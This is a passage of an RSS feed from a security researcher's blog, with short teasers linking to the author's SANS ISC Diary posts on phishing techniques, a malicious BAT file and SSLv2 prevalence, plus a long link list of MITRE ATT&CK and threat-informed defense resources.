              <category>RFC</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2023</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Phishing page with trivial anti-analysis features</title>
        <link>https://untrustednetwork.net/en/2023/11/17/phishing-anti-analysis/</link>
        <pubDate>Fri, 17 Nov 2023 11:10:00 +0100</pubDate>
        
        <atom:modified>Fri, 17 Nov 2023 11:10:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2023/11/17/phishing-anti-analysis/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at a phishing page with easily bypassed anti-analysis features&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/30412&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at a phishing page with easily bypassed anti-analysis features&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2023</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>MITRE ATT&amp;CK Links</title>
        <link>https://untrustednetwork.net/en/map/</link>
        <pubDate>Mon, 06 Nov 2023 17:00:00 +0100</pubDate>
        
        <atom:modified>Fri, 16 Feb 2024 13:00:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/map/</guid>
        <description>MITRE ATT&amp;amp;CK Working with ATT&amp;amp;CK Summiting the Pyramid Lockheed Martin Corporation - Intelligence-Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains Lockheed Martin Corporation - Cyber Kill Chain MITRE CAPEC VERIS Framework ATT&amp;amp;CK to VERIS mapping Intel TARA RE&amp;amp;CT Framework Microsoft Threat Matrix for Kubernetes Kubernetes Threat Matrix Kubenomicon Threat Matrix Microsoft DevOps Threat Matrix Open Cybersecurity Schema Framework ATT&amp;amp;CK Sync MITRE CTI Blueprints MITRE CTI Blueprints Authoring Tool MITRE ATT&amp;amp;CK Navigator MITRE ATT&amp;amp;CK Navigator - Online Version MITRE Top ATT&amp;amp;CK Techniques Calculator Insider Threat Tactics, Techniques, and Procedures (TTP) Knowledge Base Technique Inference Engine (TIE) Verizon Data Breach Investigations Report (DBIR) CrowdStrike Global Threat Report ENISA Threat Landscape Red Canary Top Techniques Elastic - Unveiling malware behavior trends MITRE Sightings Ecosystem MITRE Threat Report ATT&amp;amp;CK Mapper (TRAM) MITRE D3FEND Cloud Security Stack Mappings CTID Mappings Explorer MITRE ATT&amp;amp;CK Evaluations NIST SP 800-53 Rev.</description>
        <content:encoded>&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://attack.mitre.org/&#34;&gt;MITRE ATT&amp;amp;CK&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://attack.mitre.org/resources/working-with-attack/&#34;&gt;Working with ATT&amp;amp;CK&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://center-for-threat-informed-defense.github.io/summiting-the-pyramid/&#34;&gt;Summiting the Pyramid&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/LM-White-Paper-Intel-Driven-Defense.pdf&#34;&gt;Lockheed Martin Corporation - Intelligence-Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html&#34;&gt;Lockheed Martin Corporation - Cyber Kill Chain&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://capec.mitre.org/&#34;&gt;MITRE CAPEC&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://verisframework.org/&#34;&gt;VERIS Framework&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://center-for-threat-informed-defense.github.io/mappings-explorer/external/veris/&#34;&gt;ATT&amp;amp;CK to VERIS mapping&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://media10.connectedsocialmedia.com/intel/10/5725/Intel_IT_Business_Value_Prioritizing_Info_Security_Risks_with_TARA.pdf&#34;&gt;Intel TARA&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://atc-project.github.io/atc-react/&#34;&gt;RE&amp;amp;CT Framework&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://microsoft.github.io/Threat-Matrix-for-Kubernetes/&#34;&gt;Microsoft Threat Matrix for Kubernetes&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://kubernetes-threat-matrix.redguard.ch/&#34;&gt;Kubernetes Threat Matrix&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://kubenomicon.com/&#34;&gt;Kubenomicon Threat Matrix&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.microsoft.com/en-us/security/blog/2023/04/06/devops-threat-matrix/&#34;&gt;Microsoft DevOps Threat Matrix&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://schema.ocsf.io/&#34;&gt;Open Cybersecurity Schema Framework&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://center-for-threat-informed-defense.github.io/attack-sync/&#34;&gt;ATT&amp;amp;CK Sync&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://ctid.mitre.org/projects/cti-blueprints/&#34;&gt;MITRE CTI Blueprints&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://center-for-threat-informed-defense.github.io/cti-blueprints/&#34;&gt;MITRE CTI Blueprints Authoring Tool&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://mitre-attack.github.io/attack-navigator/&#34;&gt;MITRE ATT&amp;amp;CK Navigator&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/mitre-attack/attack-navigator&#34;&gt;MITRE ATT&amp;amp;CK Navigator - Online Version&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://center-for-threat-informed-defense.github.io/top-attack-techniques/#/&#34;&gt;MITRE Top ATT&amp;amp;CK Techniques Calculator&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://ctid.mitre.org/projects/insider-threat-ttp-knowledge-base&#34;&gt;Insider Threat Tactics, Techniques, and Procedures (TTP) Knowledge Base&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://center-for-threat-informed-defense.github.io/technique-inference-engine/&#34;&gt;Technique Inference Engine (TIE)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.verizon.com/business/resources/reports/dbir/&#34;&gt;Verizon Data Breach Investigations Report (DBIR)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.crowdstrike.com/global-threat-report/&#34;&gt;CrowdStrike Global Threat Report&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.enisa.europa.eu/publications/enisa-space-threat-landscape-2025&#34;&gt;ENISA Threat Landscape&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://redcanary.com/threat-detection-report/techniques/&#34;&gt;Red Canary Top Techniques&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.elastic.co/security-labs/unveiling-malware-behavior-trends&#34;&gt;Elastic - Unveiling malware behavior trends&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://ctid.mitre.org/projects/sightings-ecosystem&#34;&gt;MITRE Sightings Ecosystem&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://ctid.mitre.org/projects/threat-report-attck-mapper-tram/&#34;&gt;MITRE Threat Report ATT&amp;amp;CK Mapper (TRAM)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://d3fend.mitre.org/&#34;&gt;MITRE D3FEND&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/center-for-threat-informed-defense/security-stack-mappings&#34;&gt;Cloud Security Stack Mappings&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://center-for-threat-informed-defense.github.io/mappings-explorer/&#34;&gt;CTID Mappings Explorer&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://evals.mitre.org/&#34;&gt;MITRE ATT&amp;amp;CK Evaluations&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r5.pdf&#34;&gt;NIST SP 800-53 Rev. 5 - Security and Privacy Controls for Information Systems and Organizations&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.cisecurity.org/-/media/project/cisecurity/cisecurity/data/media/files/uploads/2022/cis-controls-v8-to-enterprise-attck-v82-master-mapping--5262021.xlsx&#34;&gt;CIS Controls v8 to Enterprise ATT&amp;amp;CK v8.2 Mapping&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.cisa.gov/resources-tools/resources/eviction-strategies-tool&#34;&gt;CISA Eviction Strategies Tool Project (COUN7ER)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.cisa.gov/eviction-strategies-tool&#34;&gt;CISA Eviction Strategies Tool&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.mitre.org/news-insights/publication/cyber-resiliency-engineering-framework&#34;&gt;MITRE Cyber Resiliency Engineering Framework (CREF)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://crefnavigator.mitre.org/&#34;&gt;CREF Navigator&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://csrc.nist.gov/pubs/sp/800/160/v2/r1/final&#34;&gt;NIST SP 800-160 Vol. 2 Rev. 1 - Developing Cyber-Resilient Systems: A Systems Security Engineering Approach&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://engage.mitre.org/matrix/&#34;&gt;MITRE Engage&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://mad20.com/&#34;&gt;MAD20 Skills Hub&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.youtube.com/@MAD20Tech/videos&#34;&gt;MAD20 YouTube Channel&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/rabobank-cdc/DeTTECT&#34;&gt;DeTTECT Framework&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://rabobank-cdc.github.io/dettect-editor/&#34;&gt;DeTTECT Editor - Online Version&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/siriussecurity/dettectinator&#34;&gt;Dettectinator&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/SigmaHQ/sigma/&#34;&gt;Sigma&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://car.mitre.org/&#34;&gt;MITRE Cyber Analytics Repository (CAR)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://research.splunk.com/detections/&#34;&gt;Splunk Detections&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/elastic/detection-rules&#34;&gt;Elastic Detection Rules&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://car.mitre.org/coverage/&#34;&gt;CAR Coverage&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/center-for-threat-informed-defense/sensor-mappings-to-attack&#34;&gt;Sensor Mappings to ATT&amp;amp;CK (SMAP)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://ctid.mitre.org/projects/mapping-attck-to-cve-for-impact/&#34;&gt;Mapping ATT&amp;amp;CK to CVE for Impact&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/redcanaryco/atomic-red-team&#34;&gt;Atomic Red Team&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://caldera.mitre.org/&#34;&gt;MITRE Caldera&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://lolbas-project.github.io/&#34;&gt;Living Off The Land Binaries, Scripts and Libraries (LOLBAS)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://gtfobins.github.io/&#34;&gt;GTFOBins&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://center-for-threat-informed-defense.github.io/attack-flow/&#34;&gt;Attack Flow&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://center-for-threat-informed-defense.github.io/attack-flow/ui/&#34;&gt;Attack Flow Builder&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/center-for-threat-informed-defense/adversary_emulation_library/&#34;&gt;Adversary Emulation Library&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://atlas.mitre.org/&#34;&gt;MITRE ATLAS&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://mitre-atlas.github.io/atlas-navigator/&#34;&gt;ATLAS Navigator&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://aadapt.mitre.org/&#34;&gt;MITRE AADAPT&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://center-for-threat-informed-defense.github.io/m3tid/&#34;&gt;Measure, Maximize, and Mature Threat-Informed Defense (M3TID)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://ctid.mitre.org/projects/attck-workbench&#34;&gt;ATT&amp;amp;CK Workbench&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://ctid.mitre.org/projects/attack-powered-suit/&#34;&gt;ATT&amp;amp;CK Powered Suit&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://ctid.mitre.org/tags/impact-reports&#34;&gt;MITRE Engenuity CTID: Impact Report&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://ctid.mitre.org/projects/&#34;&gt;MITRE Engenuity Center for Threat-Informed Defense&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://attack-community.org/&#34;&gt;EU ATT&amp;amp;CK Community&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.slideshare.net/MITREATTACK/presentations&#34;&gt;MITRE ATT&amp;amp;CK Presentations&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        
        
        
        
        
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Are typos still relevant as an indicator of phishing?</title>
        <link>https://untrustednetwork.net/en/2023/10/16/phishing-typos/</link>
        <pubDate>Mon, 16 Oct 2023 09:45:00 +0100</pubDate>
        
        <atom:modified>Mon, 16 Oct 2023 09:45:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2023/10/16/phishing-typos/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll discuss whether typos are still useful as an indicator of phishing&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/30316&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll discuss whether typos are still useful as an indicator of phishing&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2023</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - A new spin on the ZeroFont phishing technique</title>
        <link>https://untrustednetwork.net/en/2023/09/26/zerofont-phishing/</link>
        <pubDate>Tue, 26 Sep 2023 11:20:00 +0100</pubDate>
        
        <atom:modified>Tue, 26 Sep 2023 11:20:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2023/09/26/zerofont-phishing/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at a novel phishing technique, in which text written in zero-size font is used in order to make messages appear more trustworthy&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/30248&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at a novel phishing technique, in which text written in zero-size font is used in order to make messages appear more trustworthy&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
            
              <category>HTML</category>
            
          
            
              <category>ZeroFont</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2023</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - The low, low cost of (committing) cybercrime</title>
        <link>https://untrustednetwork.net/en/2023/08/31/cost-of-cybercrime/</link>
        <pubDate>Thu, 31 Aug 2023 12:00:00 +0100</pubDate>
        
        <atom:modified>Thu, 31 Aug 2023 12:00:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2023/08/31/cost-of-cybercrime/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at a simple phishing which demonstrates quite well that the cost of committing cybercrime can unfortunately be extremely low&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/30176&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at a simple phishing which demonstrates quite well that the cost of committing cybercrime can unfortunately be extremely low&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
            
              <category>HTML</category>
            
          
            
              <category>JavaScript</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2023</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - From small LNK to large malicious BAT file with zero VT score</title>
        <link>https://untrustednetwork.net/en/2023/08/03/lnk-to-bat/</link>
        <pubDate>Thu, 03 Aug 2023 18:30:00 +0100</pubDate>
        
        <atom:modified>Thu, 03 Aug 2023 18:30:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2023/08/03/lnk-to-bat/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at a malicious BAT file which was used in a phishing campaign last week and according to VirusTotal is still being detected as benign by all anti-virus engines it has access to&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/30094&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at a malicious BAT file which was used in a phishing campaign last week and according to VirusTotal is still being detected as benign by all anti-virus engines it has access to&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Malware</category>
            
          
            
              <category>LNK</category>
            
          
            
              <category>VirusTotal</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2023</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Kazakhstan - the world&#39;s last SSLv2 superpower... and a country with potentially vulnerable last-mile internet infrastructure</title>
        <link>https://untrustednetwork.net/en/2023/06/28/sslv2-kazakhstan/</link>
        <pubDate>Wed, 28 Jun 2023 08:30:00 +0100</pubDate>
        
        <atom:modified>Wed, 28 Jun 2023 08:30:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2023/06/28/sslv2-kazakhstan/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at a surprisingly high number of old network devices in Kazakhstan, which still support SSL version 2.0&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/29988&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at a surprisingly high number of old network devices in Kazakhstan, which still support SSL version 2.0&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>SSL</category>
            
          
            
              <category>Kazakhstan</category>
            
          
            
              <category>Vulnerability</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2023</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SSL version 2.0 support on web servers in the Czech Republic</title>
        <link>https://untrustednetwork.net/en/2023/06/08/sslv2-cz/</link>
        <pubDate>Thu, 08 Jun 2023 07:30:00 +0100</pubDate>
        
        <atom:modified>Thu, 08 Jun 2023 07:30:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2023/06/08/sslv2-cz/</guid>
        <description>Last week, I published an article discussing the weakening support for SSLv2 on web servers on the global internet. While I was writing it, it occurred to me that it might also be interesting to look specifically at the situation as it relates to web servers in the Czech Republic.
Long story short, in CZ, the situation is somewhat worse than average - globally, we currently see SSLv2 on about 0.</description>
        <content:encoded>&lt;p&gt;Last week, I published an &lt;a href=&#34;https://isc.sans.edu/diary/29908&#34;&gt;article&lt;/a&gt; discussing the weakening support for SSLv2 on web servers on the global internet. While I was writing it, it occurred to me that it might also be interesting to look specifically at the situation as it relates to web servers in the Czech Republic.&lt;/p&gt;
&lt;p&gt;Long story short, in CZ, the situation is somewhat worse than average - globally, we currently see SSLv2 on about 0.35% of all web servers, while in the Czech Republic, it is a little over 0.89%. Nevertheless, the overall trend of SSLv2 &amp;ldquo;dying off&amp;rdquo; is present even here, as you may see in the following chart&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/2023/05-sslv2/sslv2-cz-en.jpg&#34; alt=&#34;SSLv2 support on web servers in the Czech Republic&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.net/images/2023/05-sslv2/sslv2-cz-en.jpg" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SSL</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2023</category>
            
          
        
        
      </item>
      
      <item>
        <title>SANS ISC Diary - After 28 years, SSLv2 is still not gone from the internet... but we&#39;re getting there</title>
        <link>https://untrustednetwork.net/en/2023/06/01/sslv2/</link>
        <pubDate>Thu, 01 Jun 2023 10:40:00 +0100</pubDate>
        
        <atom:modified>Thu, 01 Jun 2023 10:40:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2023/06/01/sslv2/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at how SSLv2 support on web servers connected to the internet is slowly &amp;ldquo;dying off&amp;rdquo;&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/29908&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at how SSLv2 support on web servers connected to the internet is slowly &amp;ldquo;dying off&amp;rdquo;&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>SSL</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2023</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Ongoing Facebook phishing campaign without a sender and (almost) without links</title>
        <link>https://untrustednetwork.net/en/2023/05/15/facebook-phishing/</link>
        <pubDate>Mon, 15 May 2023 09:35:00 +0100</pubDate>
        
        <atom:modified>Mon, 15 May 2023 09:35:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2023/05/15/facebook-phishing/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at an interesting, long-term phishing campaign targeting Facebook users&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/29848&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at an interesting, long-term phishing campaign targeting Facebook users&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
            
              <category>HTML</category>
            
          
            
              <category>Facebook</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2023</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - &#39;Passive&#39; analysis of a phishing attachment</title>
        <link>https://untrustednetwork.net/en/2023/05/01/passive-phishing-analysis/</link>
        <pubDate>Mon, 01 May 2023 12:40:00 +0100</pubDate>
        
        <atom:modified>Mon, 01 May 2023 12:40:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2023/05/01/passive-phishing-analysis/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at a &amp;ldquo;passive&amp;rdquo;, OPSEC-friendly approach to the analysis of HTML phishing attachments&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/29798&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at a &amp;ldquo;passive&amp;rdquo;, OPSEC-friendly approach to the analysis of HTML phishing attachments&amp;hellip;&lt;/p&gt;
